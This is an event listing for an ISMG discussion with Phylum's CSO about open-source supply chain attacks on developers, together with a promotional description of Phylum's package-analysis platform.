The open-source ecosystem is the lifeblood and starting point of every software supply chain. Packages are downloaded hundreds of thousands of times a day and used in all types of software around the globe. As threat actors increasingly execute more attacks via the open-source software ecosystem, clear gaps have emerged in modern application security.
While most organizations are focused on threats from critical vulnerabilities, attackers have moved on to new, more effective tactics that directly target developers. Even with tools like software composition analysis (SCA), security analytics, endpoint protections and private repositories in place, developers can still easily install open-source packages with malicious code that triggers on install to steal secrets, and install backdoors. Developers are responsible for innovation, have the AWS, SSH and GPG keys, often the signing keys, and unfettered access to build infrastructure and source code version control systems. This makes them the new high-value targets, and the open-source ecosystem is the new permitter.
DISCUSSION POINTS
Tom Field
SVP, Editorial
ISMG
Pete Morgan
Co-Founder and CSO
Phylum
Join Pete Morgan, Co-Founder and CSO at event sponsor Phylum, to gain his unique insight into the emerging gaps in modern application security and take key takeaways of how to put these findings to work to strengthen your own enterprise’s defense.
This session will be:
The Grand Canal Shoppes, 3377 S, Las Vegas Blvd, NV 89109
Phylum is a security-as-code platform that gives security and risk teams more visibility into the code development lifecycle, and the ability to enforce security policy without disrupting innovation. Phylum analyzes open-source software packages as they are published and contextualizes the risks, protecting developers and applications at the perimeter of the open-source ecosystem and the tools used to build source code. The platform can be deployed on endpoints or plug directly into CI/CD pipelines so organizations experience seamless, always-on defense at the earliest stages of a build.
By taking part in this discussion you agree that:
Upcoming ISMG Events
Upcoming ISMG Events